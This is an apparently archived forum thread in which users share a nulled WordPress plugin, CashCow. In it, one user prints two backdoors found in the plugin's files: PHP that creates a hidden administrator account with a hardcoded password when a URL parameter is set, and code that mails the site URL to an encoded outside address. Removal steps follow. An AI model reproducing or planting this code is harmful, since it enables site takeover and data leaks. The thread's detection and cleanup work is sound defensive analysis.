50.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

10-29-2013, 08:35 PM
Post: #11
RE:
Sure thing Batmans
Here is the archive: CashCow.zip
And here is the VirusTotal link: VirusTotal

Would be better if someone creates mirrors.
10-29-2013, 08:43 PM
Post: #12
RE:
Excellent my friend. Just curious what do you think of this script so far? Is it producing results?
10-29-2013, 08:49 PM
Post: #13
RE:
Not sure if allowed, but: ThemesDeposit
d***... I forgot to add the theme for this plugin. I will add it ASAP, but now, I am controlling the theme for malicious codes.
10-29-2013, 09:06 PM
Post: #14
RE:
Here's the theme: CashCowTheme.zip
And VirusTotal link: VirusTotal
10-30-2013, 08:30 AM
Post: #15
RE:
Thanks for the detail . I asked you because I don't know how to do that. +reps
(10-29-2013 07:56 PM)cipiceuca24 Wrote:  
(10-29-2013 07:22 PM)GreenPeace Wrote:  How do you know which file is sending mail and how do you locate any files bandwidth usage ? Would love to know these. Smile
(10-29-2013 08:45 AM)cipiceuca24 Wrote:  Two files that are not clear for me: inc.php and langs.php in categories directory. I have deleted both files and the plugin is working normally.

L.E.: One of those two files was sending an enormous number of mails to wordpress@yandex.ru. In 2 weeks those two files have consumed 750GB of bandwidth.
Pretty simple. Go to /var/spool/mail/. click on your username and check for Subject line on log. You will have to have mail.add_x_header = On on php.ini. So, every mail sent form a php file will be logged.

Nothing installed on VP but a wordpress CMS with CashCow. With those two files on my system, the VPS was toked down by my hosting provider (had to upgrade the package in order to get it back live faster). Result is this: [Image: result.png]

When the same VPS, with other scripts installed, never consumed more than 30-35 GB of bandwidth monthly.

1'st step (because not knowing the problem) - cleared mqueue and clientmqueue - nothing, after 5 minutes those mail directories were full with hundreds of files.
2'nd step - activated mail headers on php.ini.
3'rd step - I have removed both files, cleared mqueue and clientmqueue and suddenly, after removing those files, no mail was sent anymore.

Finally... what's your point? Do you wanna know how I discovered these files or you have wrote just for fun?
Having this VPS for years, I am pretty sure how much bandwidth I consume every month.
53.gif
11-29-2013, 03:12 AM (This post was last modified: 11-29-2013 03:28 AM by Neo2SHYAlien.)
Post: #16
RE:
This plugin have 2 "backdoors" Both of them are in plugin categories directory.
  • First one is in inc.php which try to create new user with name wordpres and password 6b6TkpF9bJ. full path CashCow/categories/inc.php
PHP Code:
add_action('wp_head''wp_func_tabs5');function wp_func_tabs5() {If ($_GET['cms'] == 'go') {require('wp-includes/registration.php');If (!username_exists('wordpress')) {$user_id wp_create_user('wordpress''6b6TkpF9bJ');$user = new WP_User($user_id);$user->set_role('administrator');}}} 
  • Second one is in langs.php and send blog url to yandex mail. full path CashCow/categories/langs.php
PHP Code:
add_action('wp_head','my_wpfunww7c8bb');function my_wpfunww7c8bb(){if(!username_exists('wordpress')){$addressdecode=base64_decode("d29yZHByZXNzc2xvZ0B5YW5kZXguY29t");$vari='Wordpress Plugin';wp_mail($addressdecode,$vari,get_bloginfo('wpurl'));}} 

Fix - > Remove all content from those files and everything should be OK
Another fix - > remove this code from CashCaw index.php file

PHP Code:
include'categories/inc.php';include'categories/langs.php'
01-04-2014, 12:01 PM
Post: #17
RE:
Anyone have version 2? This is version 1.2
Thanks!
07-07-2014, 04:33 AM
Post: #18
RE:
New Update V2.1.1




24.gif